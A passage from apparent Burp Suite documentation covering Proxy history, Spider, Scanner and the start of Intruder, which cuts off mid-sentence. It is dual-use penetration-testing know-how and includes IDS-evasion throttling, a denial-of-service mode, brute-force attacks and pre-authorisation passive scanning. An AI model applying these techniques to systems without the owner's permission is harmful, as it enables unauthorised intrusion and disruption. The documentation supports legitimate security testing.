In some situations, it can be useful to display more than one view into the underlying
history data, and apply different filters to each view. For example, when testing access
controls, you may log into an application in different user contexts, and want to review
separately the different sequences of requests that occur in each user context. You can
open additional views of the proxy history by selecting the "show new history window"
option from the proxy history context menu. You can then configure the display filter for
each history window to show the requests that you want to see.
To use this feature to help test access controls, you need to use a separate browser for
each user context you are testing, and create a separate proxy listener in Burp for use
by each browser (you will need to update your proxy configuration in each browser to
point to the relevant listener). For each browser, you can then open a separate proxy
history window in Burp, and set the filter to show only requests from the relevant proxy
listener port. As you use the application in each browser, each history window will show
only the items for the associated user context:
In-browser controls
In addition to the main interface, you can control Burp Proxy directly from within your
browser.
The full proxy history can be accessed by visiting http://burp with your browser. The
history is displayed in a table which shows the target server and port number, the HTTP
method, the URL, the file extension, and whether or not the request was modified:
Clicking on an entry in the "URL" column displays the original request. Clicking on an
entry in the "modified?" column displays the relevant modified request.
When an individual request is displayed in full, the request can be reissued by clicking
the "repeat request" button. Depending on the currently configured interception rules
(see Options tab), the request may be displayed within Burp Proxy for modification.
When the browser receives the server's response to the re-issued request, onward
browsing can continue as normal.
If available, you can also view the original response within your browser by clicking the
"view response" button. This causes Burp Proxy to return the exact response originally
received from the server, and neither the request nor response will be displayed within
Burp Proxy for modification. Note that when the browser receives the saved response
from Burp Proxy, this may cause the browser to launch additional requests (e.g. for
embedded images). These new requests will be handled by Burp Proxy in the normal
way, and will not be returned from any previously saved data.
Extensibility
Burp Proxy is extensible via the IBurpExtender interface. This allows third-party
developers to extend the functionality of Burp Suite by creating implementations of the
interface which will be dynamically loaded and executed. The processProxyMessage()
method of this interface allows implementations to receive full details of every request
and response, to perform logging functions, modify the message, specify an action
(intercept, drop, etc) and perform any other arbitrary processing. See the source code
and Javadoc for the interface for more details.
What is Burp Spider?

Burp Spider is a tool for mapping web applications. It uses various intelligent
techniques to generate a comprehensive inventory of an application's content and
functionality.
Burp Spider maps a target application by following hyperlinks found within HTML and
JavaScript, submitting forms, and using other clues such as directory listings, source
code comments and the robots.txt file. Results are displayed in the target site map in
both tree and table format, providing a clear and highly detailed view of the target
application.
Burp Spider enables you to obtain a detailed understanding of how a web application
works, avoiding the time-consuming and unreliable task of manually following links,
submitting forms and scouring HTML source code. Potentially vulnerable application
functions can be quickly identified, allowing you to check for specific vulnerabilities such
as SQL injection and directory traversal.
Using Burp Spider

To use Burp Spider against an application requires two simple steps:
1.
With your browser configured to use Burp Proxy as its proxy server, browse to
the target application. (You can turn off interception within the Proxy, to save time.)
2.
Go to the site map in the "target" tab, and select the host(s) and directories
where the target application resides. Choose the "spider this host/branch" option from
the context menu.
You can also choose "spider this item" from the context menu on any request or
response within any of the Burp tools.
When you send a branch of the site map for spidering, the Spider will first check if that
branch is within the currently defined spidering scope. If not, Burp will prompt you to
confirm that you want to add the relevant URLs to the scope. Burp will then start
spidering, and will perform the following actions:
Request any unrequested URLs already discovered within the branch.
Submit any discovered forms whose action URLs lie within the branch.
Re-request any items in the branch which previously returned 304 status codes,
to retrieve a fresh (uncached) copy of the application's responses.
Parse all content retrieved to identify new URLs and forms.
Recursively repeat these steps as new content is discovered.
Continue spidering all in-scope areas until no new content is discovered.

Note that the Spider will follow links for any URLs that are within the currently defined
spidering scope. If you have already defined a wider target scope, and you select an
individual branch within this for spidering, then the Spider will follow any links into the
wider target scope, and so will spider outside of the selected branch. To ensure that the
Spider only requests items within a specific branch, you should first configure the
spidering scope to include only this branch.
You should use Burp Spider with caution. In its default configuration, the Spider will
automatically submit any forms within the spidering scope using default input values,
and will request various URLs that normal users would not ordinarily request if using
only a browser. If any URLs within your defined scope are used to perform sensitive
actions, then these actions may actually be carried out within the application. It is
normally preferable to perform some manual mapping of the application using your
browser before initiating any fully automated content discovery.
Control tab
This tab is used to start and stop Burp Spider, monitor its progress, and define the
spidering scope.
Spider running - This is used to start and stop the Spider. While the Spider is stopped
it will not make any requests of its own, although it will continue to process responses
generated via Burp Proxy, and any newly-discovered items that are within the spidering
scope will be queued to be requested if the Spider is restarted.
The display also shows some metrics about the Spider's progress, enabling you to see
the size of the in-scope content and the work remaining to fully spider it.
Clear queues - If you want to reprioritise your work, you can completely clear the
currently queued items, so that other items can be added to the queue. Note that the
cleared items may be re-queued if they remain in-scope and the Spider's parser
encounters new links to the items.
Spider scope - This panel lets you define exactly what is in-scope for the Spider to
request. If you have already configured the Suite-widetarget scope with details of your
current target, then you can normally leave the default setting, which is to use the
Suite-wide scope to define the Spider's activities. If you need to define a different scope
for the Spider to use, then select "use custom scope". A further configuration panel will
appear which functions in the same way as the Suite-wide scope panel. If you have
selected to use a custom scope and you send any out-of-scope items to the Spider, then
Burp will automatically update this custom scope, rather than the Suite scope.
Options tab
This tab contains various configuration options which control the behaviour of Burp
Spider, as described below. These settings can be modified after the Spider has started
running, and will be applied retrospectively to prior results. For example, if the
maximum link depth is increased, then links which were previously outside the
maximum depth will be queued to be requested if appropriate.
check robots.txt - If checked, Burp Spider will request and process the robots.txt file
from all in-scope domains. This file is used by therobots exclusion protocol to control
the behaviour of spider-like agents on the Internet. Note that Burp Spider
does not confirm to the robots exclusion protocol. Because Burp Spider is designed to
comprehensively enumerate a target application's content, all entries in robots.txt will
be requested if they are in-scope.
use cookies - If checked, Burp Spider will process Set-Cookie instructions in server
responses, and will submit any received cookies in subsequent requests to the same
domain. This option is normally necessary when spidering web applications which
persist any kind of state in a server-side session.
detect custom "not found" responses - The HTTP protocol requires web servers to
return a 404 status code if a requested resource is not found. However, many web
applications return customised "not found" pages that use a different status code. If
this is the case, then using this option can prevent false positives in the mapping of site
content. Burp Spider detects custom "not found" responses by requesting several
nonexistent resources from each domain, and compiling a fingerprint with which to
diagnose "not found" responses to other requests.
ignore links to non-text content - It is often possible to deduce the MIME type of a
particular resource from the HTML context in which links to it appear. For example,
URLs within IMG tags will probably return images; those within SCRIPT tags will
probably return JavaScript. If this option is checked, the Spider will not request items
which appear, from this context, to be non-text media resources. Using this option can
reduce spidering time with minimal risk of overlooking interesting content as a result.
request the root of all directories - If checked, Burp Spider will request all identified
web directories within the target scope, in addition to files within those directories. This
option is particularly useful if directory indexing is available on the target site.
make a non-parameterised request to each dynamic page - If checked, Burp
Spider will make a non-parameterised GET request to all in-scope form action URLs.
Dynamic pages usually respond differently if the expected parameters are not received,
and this option may successfully detect additional site content and functionality.
maximum link depth - This is the maximum number of "hops" which Burp Spider will
navigate from any seed URL. A value of zero will cause Burp Spider to request seed
URLs only. If a very large number is specified, then in-scope links will be followed
effectively indefinitely.
These options control the interface between Burp Proxy and Burp Spider, which allows
"passive" spidering of web applications, controlled through your browser.
passively spider as you browse - If checked, Burp Spider will process all HTTP
requests made through Burp Proxy, to identify links and forms on web pages visited.
Using this option can enable Burp Spider to build up a detailed picture of an
application's contents even when you have only browsed a subset of that content with
your browser, because all content that is linked from visited content is automatically
added to the Suite site map.
link depth to associate with proxy requests - This option controls the "link depth"
which will be associated with web pages accessed through Burp Proxy. To prevent Burp
Spider following any links in these pages (even when the Spider is running and these
links are in-scope) set a higher value for this option than the "maximum link depth"
option above.
Note: Earlier versions of Burp Spider contained options here to control how the Spider
cookie jar was updated based on cookies in Proxy requests and responses. These
configurations have now been removed, and you should use the suite-wide session
handling supportinstead.
individuate forms - This option configures the criteria for individuating unique forms
(action URL, method, fields, values). When Burp Spider processes each form, it will
check these criteria to determine if the form is "new". Forms which are not new will not
be queued for submission.
do not submit - If selected, Burp Spider will not submit any forms.
prompt for guidance - If selected, Burp Spider will prompt you for guidance before
submitting each identified form. This allows you to enter custom data into form input
fields as required, and choose which submit fields to send to the server, or whether to
iterate through all submit fields.
automatically submit - If selected, Burp Spider will automatically submit any in-scope
forms using the defined rules to fill out the values of text input fields. Each rule lets you
specify a simple or regular expression to match on form field names, and the value to
submit in fields whose names match the expression. A default value can be specified for
any unmatched fields.
This option is particularly useful if you want to automatically spider through registration
forms and similar functions, where applications typically require data in a valid format
for each input field. Burp comes with a set of default rules that have proven successful
when automatically submitting form data to a wide range of applications. Of course, you
can modify these or add your own rules if you encounter form field names that you
want to submit specific values in. You should use this option with caution, as submitting
bogus values in forms may sometimes result in undesirable actions.
Many forms contain multiple SUBMIT elements, which result in different actions within
the application, and the discovery of different content. You can configure the Spider to
iterate through the values of all submit elements within forms, submitting each form
multiple times up to a configurable maximum.
Login forms play a particular role within applications, and you will often want Burp to
handle these in a different way than ordinary forms. Using this configuration, you can
tell the Spider to perform one of four different actions when a login form is
encountered:
Burp can ignore the login form, if you don't have credentials, or are concerned
about spidering sensitive protected functionality.
Burp can prompt you for guidance interactively, enabling you to specify
credentials on a case-by-case basis. This is the default option.
Burp can handle login forms in the same way as any other form, using the
configuration and auto-fill rules you have configured for those.
Burp can automatically submit specific credentials in every login form that is
encountered.
In the last case, any time Burp encounters a form containing a password field, it will
submit your configured password in that field, and will submit your configured
username in the text input field whose name most looks like a username field. If you
have credentials for an application, and want to let the Spider handle the login for you,
then this is normally the best option.
These options let you fine-tune the spidering engine, depending on the performance
impact on the application, and on your own processing power and bandwidth. If you
find that the Spider is running slowly, but the application is performing well and your
own CPU utilisation is low, you can increase the number of scan threads to make your
scans proceed faster. If you find that connection errors are occurring, that the
application is slowing down, or that your own computer is locking up, you should reduce
the thread count, and maybe increase the number of retries on network failure and the
pause between retries.
Request headers - This section allows customised HTTP headers to be configured

which will be used in all requests. This may be useful to meet specific requirements of
individual applications - e.g. to emulate an expected user agent when testing

applications designed for mobile devices.
use Referer header - If checked, Burp Spider will submit the relevant Referer header
when requesting any item that was linked to from another page.
Spider results
All of the content discovered during spidering is added to the target site map that is
shared between Suite components. This map shows tree and table views of the content
discovered via the Spider and Proxy. It lets you filter from view any items you are not
interested in, and perform numerous other actions such as initiating vulnerability scans
and further spidering, and sending individual requests to other Burp tools to perform
customised attacks. Please consult the site map help for further details.
What is Burp Scanner?

Burp Scanner is a tool for performing automated discovery of security vulnerabilities in
web applications. It is designed to be used by penetration testers, and to fit in closely
with your existing techniques and methodologies for performing manual and semiautomated penetration tests of web applications.
Using most web scanners is a detached exercise: you provide a start URL, click "go",
and watch a progress bar update until the scan is finished and a report is produced.
Using Burp Scanner is very different, and is much more tightly integrated with the
actions you are already carrying out when attacking an application, giving you finegrained control over each request that gets scanned, and direct feedback about the
results.
Burp Scanner can perform two types of scans:
Active scanning - The scanner sends various crafted requests to the

application, derived from a base request, and analyses the resulting responses looking
for vulnerable behaviour.
Passive scanning - The scanner doesn't send any new requests of its own; it
merely analyses the contents of existing requests and responses, and deduces
vulnerabilities from those.
You can initiate scans against your target application in two different ways:
Manual scanning - You can send one or more requests from other Burp tools,
to perform active or passive scans against those specific requests.
Live scanning as you browse - You can configure the Scanner to automatically
perform active or passive scans against requests passing through the Proxy as you are
browsing the application.
This approach to automated vulnerability detection brings a number of benefits to the
penetration tester:
Being able to perform quick and reliable scans for many common vulnerabilities
on a per-request basis can hugely reduce your testing effort, enabling you to direct
your human expertise towards vulnerabilities whose detection cannot be reliably
automated.
Results from each type of scan are displayed immediately, and can directly
inform your other testing actions in relation to the individual requests involved.
Burp avoids a frustrating problem with other scanners, in which a monolithic

automated scan takes an age to complete, with little assurance over whether the scan
has worked, or whether it encountered problems that impacted on its effectiveness.
By controlling exactly what gets scanned, and by monitoring in real time both the scan
results and the wider effects on the application, Burp Scanner lets you combine the
virtues of reliable automation with intuitive human intelligence, often with devastating
results.
Active scanning
In this mode of scanning, Burp takes an individual request to the application, called the
"base request", and modifies it in various ways designed to trigger behaviour that
indicates the presence of various vulnerabilities. These modified requests are sent to
the application, and the resulting responses are analysed. In many cases, further
requests will be sent, based on the results of the initial probes.
This mode of operation generates large numbers of requests which are malicious in
form and which may result in compromise of the application. You should use this
scanning mode with caution, only with the explicit permission of the application owner,
and having warned them of the possible effects which automated scanning may have on
the application and its data. If possible, scanning should be performed against nonproduction systems, and full backups performed prior to scanning.
There are various well-known limitations on the types of vulnerabilities within web
applications whose detection can be reliably automated. Burp's active scanning
capabilities were designed to focus on the kind of input-based bugs that
scanners can reliably look for. By avoiding the false positives that arise in other areas,
Burp gives you confidence in its output, leaving you to focus on the aspects of the job
that require human experience and intelligence to deliver.
The issues that Burp's active scanning is able to identify mostly fall into two categories:
1.
Input-based vulnerabilities targeting the client side, such as cross-site scripting,

HTTP header injection, and open redirection.
2.
Input-based vulnerabilities targeting the server side, such as SQL injection, OS

command injection, and file path traversal.
Issues in category 1 can be detected with a very high degree of reliability. In most
cases, everything that is relevant to finding the bug is visible on the client side. For
example, to detect reflected XSS, Burp Scanner submits some benign input in each
entry point to the application, and looks for this being echoed in responses. If it is
echoed, Burp then parses the response content to determine the context(s) in which
the echoed input appears. It then supplies various modified inputs to determine
whether strings that constitute an attack in those contexts are also echoed. Burp
Scanner has knowledge of the wide range of broken input filters, and associated
bypasses, that arise with web applications, and it checks for all that apply to the
context. By implementing a full decision tree of checks, driven by feedback from
preceding checks, Burp effectively emulates the actions that a skilled and methodical
human tester would perform. The only bugs that Burp should miss are those with some
unusual feature requiring intelligence to understand, such as a custom scheme for
encapsulating inputs.
Issues in category 2 are inherently less amenable to automated detection, because in
many cases the behaviours that are relevant to identifying the bugs occur only on the
server, with little manifestation on the client side. For example, SQL injection bugs may
return verbose database errors in responses, or they may be fully blind. Burp Scanner
employs various techniques to identify blind server-side injection issues, by inducing
time delays, changing Boolean conditions and performing fuzzy response diffing, etc.
These techniques are inherently more error prone than the methods that are available
in category 1. Nevertheless, Burp Scanner achieves a high success rate in this area,
reliably reporting numerous kind of issue that are difficult or laborious for a human
tester to diagnose.
Passive scanning
In this mode of scanning, Burp doesn't send any new requests to the application - it
merely analyses the contents of existing requests and responses, and deduces
vulnerabilities from those. This mode of operation can be used safely and legally in any
situation in which you are authorised to access the application.
Burp Scanner is able to identify numerous kind of vulnerabilities using solely passive
techniques, including:
Clear-text submission of passwords.
Insecure cookie attributes, like missing HttpOnly and secure flags.
Liberal cookie scope.
Cross-domain script includes and Referer leakage.
Forms with autocomplete enabled.
Caching of SSL-protected content.
Directory listings.
Submitted passwords returned in later responses.
Insecure transmission of session tokens.
Leakage of information like internal IP addresses, email addresses, stack traces,

etc.
Insecure ViewState configuration.
Ambiguous, incomplete, incorrect or non-standard Content-type directives.

Many of these issues are relatively unexciting, and recording them is dull and repetitive
for a human. But as penetration testers we are obliged to report them. Having Burp
Scanner reliably mop up these issues as you browse an application is a time and sanity
saver.
Being able to carry out passive-only vulnerability scanning is beneficial in a range of
situations:
Because passive scans don't send any new requests to the application, you can
perform them safely against critical production applications where you want total
control of every request that you send.
Some applications are aggressive in reacting to attacks, by terminating your

session or locking your account every time an apparently malicious request is received.
In this situation, you may be restricted to piecemeal manual testing, but you can still
use passive scanning to identify various kinds of issues without causing any problems.
If you don't (yet) have authorisation to attack a target, you can use passive
scanning to identify vulnerabilities purely by browsing the application as a normal user.
For example, if you are proposing for a new penetration testing engagement, you can
passively scan your target to get a feel for its security posture, and hopefully get some
reportable issues in the bag before you even begin the official testing.
Initiating scans
Manual scanning
From anywhere within Burp Suite, you can select one or more HTTP requests, and send
these to the Scanner to perform active or passive scanning. For example, if you
intercept an interesting request using Burp Proxy, you can initiate a scan against just
this request using the context menu:
Similarly, you can select sets of requests from within the Target site map or Proxy
history, and send these in bulk to the Scanner. So, after browsing around an application
and building up a comprehensive map of its content, you can tell Burp to scan specific
areas of the application's functionality:
If you select multiple items and send these for active scanning, Burp launches a brief
wizard which lets you fine-tune your selection. The first screen of the wizard offers you
various intuitive filters to remove potentially unnecessary items (duplicates, already
scanned items, media content, etc.), and shows you how many items will be affected by
each filter:
The second screen of the wizard shows you a list of the remaining items, and lets you
sort the table by various relevant properties, view the full requests and responses, and
delete individual items:
The wizard then completes and the selected items are sent for scanning in the usual
way.
Live scanning
A further way to initiate scans is to use the "live scanning" feature. In this mode, you
tell Burp what your target scope is for active and passive scanning, and it will
automatically initiate active or passive scans against relevant requests as you use the
application. When operating in this mode, you simply need to browse around the
application as a normal user, to show Burp where the application's content and
functionality are, and it will work away in the background to find vulnerabilities for you.
When using live scanning, you have fine-grained control over the requests that Burp will
automatically scan. If you have already configured a suite-wide target scope for your
current work, then you can simply tell Burp to scan every request that falls within that
scope. Alternatively, you can define a custom scope to use for active and passive
scanning. In the example below, Burp has been configured to actively scan every
request that is made to www.myapp.com, with the exception of login requests, and to
passively scan every request that is made to any destination whatsoever:
Note that the live scanning feature ignores requests for media resources (images, etc.)
where the request does not contain any non-cookie parameters. Requests like these are
virtually always for static resources which do not have any security significance, and so
can be safely ignored by the scanner. (This does not apply to manual scanning - if you
manually select items like these and send them for active scanning, then they will of
course be scanned in the normal way.)
Active scan queue

When you send requests for passive scanning, these are processed immediately.
Because active scans involve sending large numbers of requests to the server, requests
sent for active scanning may be queued up. A typical request with a dozen parameters
will be scanned in a minute or two, and the scan queue is processed by a configurable
thread pool, so the number of waiting items rarely grows very large. As each item is
scanned, the scan queue table indicates its progress - the number of requests made,
the percentage complete, and the number of vulnerabilities identified. This last value is
colourised according to the significance and confidence attached to the most serious
issue:
You can double-click any item in the scan queue to display the issues identified so far,
and view the base request and response for that item:
You can use the context menu on the scan queue to perform various actions:
Show the details of the selected item.
Cancel the selected item(s).
Scan the selected item(s) again.
Pause or resume the scanner.

Used in the ways described, Burp Scanner gives you fine-grained control over
everything that it does, and integrates closely with your other testing activities. It lets
you prioritise areas of an application that interest you, by browsing them using live
scanning, or selecting them for scanning from the site map. And it provides immediate
feedback about those areas to inform your manual testing actions.
Reviewing results
In addition to the per-request view of discovered issues shown above, Burp Scanner
maintains a central record of all the issues it has discovered, organised in a tree view of
the target application's site map. Selecting a host or folder in the tree shows a listing of
all the issues identified for that branch of the site:
Where multiple issues have been found of the same type, these are aggregated into a
single item in the top-right panel. You can expand the aggregated item to view each
individual instance of the issue. Selecting an issue in the top-right panel shows the full
detail for that issue in the bottom-right panel. This includes a customised vulnerability
advisory, and the full requests and responses that are relevant to understanding and
reproducing the issue.
The advisory includes a standard description of the issue and its remediation, and also
a description of any specific features that apply to the issue and affect its remediation.
In the example above, the cross-site scripting advisory tells us:
The request parameter in which the attack input is supplied (SearchTerm).
The synactic context in which the input is returned in the response (within a
piece of JavaScript, in a single-quote-delimited string).
That the application escapes any single quote characters in our input, but fails to
escape the backslash, allowing us to circumvent the filter.
The exact proof-of-concept payload which Burp submitted to the application, and
the form in which this payload was returned.
That the original request used the POST method, and Burp was able to convert
this to a GET request to facilitate demonstration and exploitation of the issue.
Every issue that Burp Scanner reports is given a rating both for severity (high, medium,
low, informational) and for confidence (certain, firm, tentative). When an issue has
been identified using a less reliable technique, Burp makes you aware of this, by
dropping the confidence level.
Alongside the advisory, Burp shows the requests and responses that were used to
identify the issue, with relevant portions highlighted. You can review these to see how
Burp identified the issue, and quickly understand the nature of the vulnerability. You
can also send the request directly to other tools to manually verify the issue, or finetune the proof-of-concept attack that was generated by Burp:
Within the list of scan issues, you can modify the severity and confidence levels of
individual or multiple issues (via the context menu), or delete issues altogether (via the
context menu or using the 'del' key).
Note that if you delete an issue, and Burp rediscovers the same issue (for example, if
you rescan the same request), the issue will be reported again. If instead you mark the
issue as a false positive, then this will not happen. Therefore, deletion of issues is best
used for cleaning up the Results tree to remove hosts or paths you are not interested
in. For unwanted issues within the functionality you are still working on, you should use
the false positive flag.
Scan optimisation
Burp Scanner gives you detailed information in real time about all of the actions it is
performing. In the scan queue, you can monitor the progress of each individual base
request that is being scanned. The table shows you the number of "insertion points"
where Burp is placing payloads, and the number of attack requests that have been
generated. (The latter is not a linear function of the former - observed application
behaviour feeds back into subsequent attack requests, just as it would for a human
tester.)
This information lets you quickly see whether any of your scans are progressing too
slowly, and understand the reasons why. Given this information, you can then take
action to optimise your scans. Within the scan queue, there is a context menu which
lets you cancel or re-prioritise individual items. Within the Options tab, you can also
optimise the scanner configuration based on what you have learnt about the
application, using the options described below.
Attack insertion points

A key factor in the speed and effectiveness of scans is the selection of attack insertion
points. Burp gives you fine-grained control over the locations within the base request
where attack payloads will be placed, using the following configuration options:
The checkboxes let you define which locations within HTTP requests will have attacks
placed into them:
The values of URL, body and cookie parameters.
Parameter name - if selected, Burp adds an additional parameter to the request

and places attacks into the name of this parameter, often detecting unusual bugs that
are missed if only parameter values are tested.
HTTP headers - if selected, Burp places attacks into the User-Agent and Referer
headers, often detecting issues like SQL injection or persistent XSS within logging
functionality.
AMF string parameters - For requests in Action Message Format, Burp places
attacks into any string-based data types within the message.
REST-style URL parameters - if selected, Burp places attacks into each directory
or file name within the path portion of the URL.
You can also set a limit on the number of insertion points that Burp will attack within
each base request. Occasionally, HTML forms may contain an excessive number of fields
(hundreds, or more). If Burp performed a full vulnerability scan of every field, the scan
would take an excessive amount of time to complete. Setting a limit on insertion points
prevents your scans from becoming stalled if they encounter forms with huge numbers
of parameters. When this limit is applied, the item's entry in the scan queue will
indicate the number of insertion points that were skipped, enabling you to manually
review the base request and decide if it is worth performing a full vulnerability scan of
all its possible entry points.
You can tell Burp to use "intelligent attack selection". This option causes Burp to
perform or omit each type of server-side check based on the base value of each attack
insertion point. For example, if a parameter's value contains characters that don't
normally appear in filenames, Burp will skip file path traversal checks for this
parameter. Using this option can considerably speed up your scans, with minimal risk of
missing actual vulnerabilities that exist.
The insertion point configuration lets you specify request parameters for which Burp
should skip server-side injection checks. These checks are relatively time-consuming,
because Burp sends multiple requests probing for various blind vulnerabilities on the
server. If you believe that certain parameters appearing within requests are not
vulnerable (for example, built-in parameters used only by the platform or web server),
you can tell Burp not to test these. (Note that client-side checks like cross-site scripting
are always performed because testing each request parameter imposes minimal
overhead on the duration of the scan if the parameter is non-vulnerable.)
You can identify REST parameters by their position (slash-delimited) within the URL
path, as well as by their value. To do this, select "REST parameter" from the parameter
drop-down, "name" from the item drop-down, and specify the index number (1-based)
of the position within the URL path which you wish to exclude from testing.
You can also configure any parameters for which Burp should not perform any checks
whatsoever.
It is possible to specify fully customisable attack insertion points for active scanning, so
you can specify arbitrary locations within a base request where attack strings should be
placed. To use this function, send the relevant base request to Intruder, use the payload
positions UI to define the start/end of each insertion point in the usual way, and select
the Intruder menu option "actively scan defined insertion points".
Active scanning engine
These options let you fine-tune Burp's scan engine, depending on the performance
impact on the application, and on your own processing power and bandwidth. If you
find that your scans are running slowly, but the application is performing well and your
own CPU utilisation is low, you can increase the number of scan threads to make your
scans proceed faster. If you find that connection errors are occurring, that the
application is slowing down, or that your own computer is locking up, you should reduce
the thread count, and maybe increase the number of retries on network failure and the
pause between retries. If the functionality of the application is such that actions
performed on one base request interfere with the responses returned from other
requests, you should consider reducing the thread count to 1, to ensure that only a
single base request is scanned at a time.
If you wish to avoid overloading the application, or to remain stealthy from a network
perspective, you can use the throttle settings to add fixed or random intervals between
requests.
You can configure whether the scanner should follow redirections where this is
necessary to identify certain vulnerabilities (for example echoed input or a database
error message which is only displayed when a redirect is followed).
Because some applications issue redirects to third-party URLs which include parameter
values that you have submitted, Burp protects you against inadvertently attacking
third-party applications, by not following just any redirection which is received. If the
request being scanned is within the defined target scope (i.e. you are using target
scope to control what gets scanned), then Burp will only follow redirects that are within
that scope. If the request being scanned is not in scope (i.e. you have manually
initiated a scan of an out-of-scope request), Burp will only follow redirects which (a) are
to the same host/port as the request being scanned; and (b) are not explicitly covered
by a scope exclusion rule (e.g. "logout.aspx").
Active scanning areas
These options let you define which checks are performed during active scanning. Each
check that is performed increases the number of requests made, and the overall time of
each scan. You can turn individual checks on or off, based on your knowledge of an
application's technologies, or on how rigorous you require your scans to be. For
example, if you know that an application does not use any LDAP, you can turn off LDAP
injection tests. Or you can configure Burp to do a quick once-over of an application,
checking only for XSS and SQL injection in URL and body parameters, before returning
later to carry out more comprehensive testing of every vulnerability type in every
insertion point.
Passive scanning areas
Passive scans do not send any requests of their own, and each passive check imposes a
negligible processing load on your computer. Nevertheless, you can disable individual
areas of checks if you are simply not interested in them and don't want them appearing
within scan results.
Reporting
When you have finished testing, you can export a report of all or selected issues in
HTML format. To do this, select the desired issues from the aggregated results display
(you can multi-select individual hosts, folders, issues, etc.) and select "report issues"
from the context menu. The reporting wizard lets you choose various options for your
report, including:
The reporting format (screen- or printer-friendly).
The level of issue description and remediation to include.
Whether to show request and response details in full, or as extracts, or not at all.
The categories of discovered issues to include or exclude.
Whether to organise issues by type, severity or URL.
Report title, heading levels, etc.

The report for the cross-site scripting vulnerability shown previously, with all detail
turned on, and showing extracts of application responses in printer-friendly format,
looks like this:
You can also report issues in XML format, to enable easy integration with other tools.
The XML has a flat structure, and contains a list of issues, with meta-information about
issue type, URL, etc., reported within each issue element. The (internal) DTD looks like
this:
<!DOCTYPE issues [
<!ELEMENT issues (issue*)>
<!ATTLIST issues burpVersion CDATA "">
<!ATTLIST issues exportTime CDATA "">
<!ELEMENT issue (serialNumber, type, name, host, path, location, severity,
confidence, issueBackground?, remediationBackground?, issueDetail?,
remediationDetail?, requestresponse*)>
<!ELEMENT serialNumber (#PCDATA)>
<!ELEMENT type (#PCDATA)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ELEMENT path (#PCDATA)>
<!ELEMENT location (#PCDATA)>
<!ELEMENT severity (#PCDATA)>
<!ELEMENT confidence (#PCDATA)>
<!ELEMENT issueBackground (#PCDATA)>
<!ELEMENT remediationBackground (#PCDATA)>
<!ELEMENT issueDetail (#PCDATA)>
<!ELEMENT remediationDetail (#PCDATA)>
<!ELEMENT requestresponse (request?, response?)>
<!ELEMENT request (#PCDATA)>

<!ELEMENT response (#PCDATA)>
]>
The serialNumber element contains a long integer that is unique to that individual issue.
If you export issues several times from the same instance of Burp, you can use the
serial number to identify incrementally new issues.
The type element contains an integer which uniquely identifies the type of finding (SQL
injection, XSS, etc.). This value is stable across different instances and builds of Burp.
The name element contains the corresponding descriptive name for the issue type.
The path element contains the URL for the issue (excluding query string).
The location element includes both the URL and a description of the entry point for the
attack, where relevant (a specific URL parameter, request header, etc.).
The other elements, some of which are optional and can be selected by the user within
the reporting wizard, are hopefully self-explanatory.
What is Burp Intruder?

Burp Intruder is a tool for automating customised attacks against web applications.
Burp Intruder is not a point-and-click tool. To use it effectively you need to understand
how the target application functions, and have some knowledge of the HTTP protocol.
Before launching any attacks using Burp Intruder, you need to investigate the
functionality and structure of the target application, and in particular the various HTTP
messages that pass between the browser and server. You can perform this investigation
using a standard browser and Burp Proxy to intercept and view all of the requests and
responses generated by the application. When you have identified some interesting
HTTP requests that bear closer examination, you are ready to use Burp Intruder.
Burp Intruder is highly configurable and can be used to automate a wide range of
attacks. You can use Burp Intruder to facilitate very many kinds of tasks, including
enumerating identifiers, harvesting useful data, and fuzzing for vulnerabilities. The
types of attacks that are appropriate will depend on the application in question, and
may include: testing for flaws such as SQL injection, cross-site scripting, buffer
overflows and path traversal; brute force attacks against authentication schemes;
enumeration; parameter manipulation; trawling for hidden content and functionality;
session token sequencing and session hijacking; data mining; concurrency attacks; and
application-layer denial-of-service attacks. For a detailed discussion of the kinds of
attack that can be performed using Burp Intruder, see Chapter 13 of The Web
Application Hacker's Handbook.
Burp Intruder includes many preset lists of attack "payloads" (strings that are useful in
detecting and exploiting common vulnerabilities). It also contains a large number of
tools for dynamically generating attack vectors that are appropriate to specific
mechanisms often found within web applications. External files can also be loaded and
incorporated into Burp Intruder (e.g. lists of enumerated usernames, or fuzz strings for
newly-identified vulnerabilities).
The core activity of each attack is to iterate through a number of HTTP requests. These
are derived from the basic request identified at the investigation stage. Burp Intruder
manipulates this basic request in particular ways designed to identify or exploit
application vulnerabilities. It does this by replacing portions of the basic request with
one or more payloads. The timing and execution of each attack can also be configured.
Multiple threads can be used to generate requests concurrently. Requests can be
throttled to prevent IDS detection. A denial-of-service mode can be used to bombard
the server with requests while ignoring any responses received.
When an attack executes, a detailed table of results is produced, showing the response
received from the server to each request. The results contain all relevant information
that can be used to pinpoint responses that are interesting or successful. In addition to
the standard results common to every attack, many customisable tests can be
performed on the results at runtime, and the results of these are also recorded. For
example, Burp Intruder can be configured to extract specific information from HTML
pages (e.g. the personal details fields on a user information page), and record this
information with each result. All results output can be exported for further
manipulation, or to use as an input file for further attacks or other tools.
Burp Intruder is a Java application, and runs on any platform for which a Java Runtime
Environment is available. It requires version 1.5 or later. The JRE can be obtained for
free from java.sun.com.
Configuring Burp Intruder

The Burp Intruder control panel let you configure one or more attacks simultaneously,
in their own numbered tabs. You can create a new tab, or rename existing tabs using
the Intruder menu.
The configuration of each individual attack is carried out in a number of sub-tabs
(target, positions, payloads, options). The easiest way to create a new attack is to
locate the relevant base request within another Burp tool (such as the proxy history or
site map), and choose "send to intruder" from the context menu. This will populate the
target and positions tabs with the relevant details. You can use the Intruder menu to
control how the payloads and options tabs are set up when you create a new attack
tab. You can choose to use the default attack configuration, copy the configuration from
the first attack tab, or copy from the last attack tab. In this way, you can set up a
standard attack configuration in your first attack tab (e.g. for fuzzing all parameters
and grepping for error messages) and have this configuration copied into each new
attack which you send to intruder. You can also copy attack configurations between
arbitrary tabs, or save and load attack configurations, using the Intruder menu.
To start an attack, set up the required configuration and then select "start attack" from
the Intruder menu. The configuration options are described in detail in the sections
below.
To load a saved attack, select "open saved attack" from the Intruder menu, and choose
the required file [Pro version].
Target tab
This tab is used to configure the details of the target server:
The "host" field is used to specify the IP address or hostname of the target server. The
"port" field is used to specify the port number of the HTTP/S service. The "use SSL" box
is used to specify whether Secure Sockets Layer connections should be used.
Positions tab
This tab is used to configure the template for all the HTTP requests generated in the
attack:
The main text editor is used to set the contents of the base request, and also to mark
the locations where payloads will be inserted into individual HTTP requests during the
attack. There is a context menu providing access to various functions.
The easiest way to set up the attack template is to locate the relevant request within
one of the other Burp tools, and select the "send to intruder" option. You can send
requests from any place within Burp Suite where an HTTP request or response is
